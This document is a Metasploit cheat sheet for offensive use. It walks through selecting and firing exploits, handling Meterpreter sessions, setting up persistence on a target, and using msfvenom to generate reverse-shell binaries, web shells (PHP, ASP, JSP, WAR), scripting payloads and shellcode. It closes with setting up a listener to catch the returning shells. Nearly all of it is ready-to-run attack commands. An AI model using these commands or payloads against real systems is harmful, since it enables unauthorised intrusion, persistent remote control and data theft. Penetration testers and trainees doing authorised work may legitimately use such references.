Metasploit cheatsheet

Msfconsole

msfconsole

# Commands to run once the console is running
search code-of-vulnerability
# example
# search cve-2010-2075

use id-of-exploit
# replace id-of-exploit with the id shown in the search results or the path of the module
# example
# use 0
# use exploit/unix/irc/unreal_ircd_3281_backdoor

show payloads

set payload id-of-payload
# replace id-of-payload with the id shown by show payloads or the path of the payload
# example
# set payload 0
# set payload cmd/unix/bind_perl

show options

set OPTION_NAME value
# example
set RHOST 192.168.10.11

show targets
set target 0

exploit

Meterpreter

# List all sessions running on background
msf> sessions

# Start interacting with the session
msf> sessions <session-id>

# Drop into a system command shell
meterpreter> shell
# Upgrade the plain command shell to a fully functional TTY shell (run inside the dropped shell)
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Persistence on the target system
# -h: Help
meterpreter> run persistence -h
# -U: Automatically start when the user logs on
# -i: The interval in seconds between each connection attempt
# -p: The port on which the system running Metasploit is listening
# -r: The IP of the system running Metasploit listening for the connect back
meterpreter> run persistence -U -i 5 -p 443 -r <local-ip>


Creating Metasploit Payloads

# List available payloads
msfvenom -l

Binaries

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

# Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
# The raw PHP output has no opening tag; prepend '<?php ' so the file is parsed as PHP
# (pbcopy/pbpaste are macOS clipboard tools; on Linux use sed -i '1s/^/<?php /' shell.php instead)
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

# Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

# Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

# Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Shellcode

For shellcode, run 'msfvenom --help-formats' to list the valid output formats. msfvenom emits the shellcode as a source snippet in the chosen language (for example C or Python) that can be pasted directly into an exploit.

# Linux based shellcode (replace <format> with one of the formats listed by --help-formats)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f <format>

# Windows based shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format>

# Mac based shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f <format>

Handlers

The exploit/multi/handler module sets up a listener that catches the incoming shells from the payloads above. Configure it with the following commands, using the same payload, LHOST and LPORT that were given to msfvenom.

use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <local-ip>
set LPORT <port>
set ExitOnSession false
exploit -j -z

Once the values are filled in, save these commands to a resource file and start the handler with 'msfconsole -L -r <resource-file>'.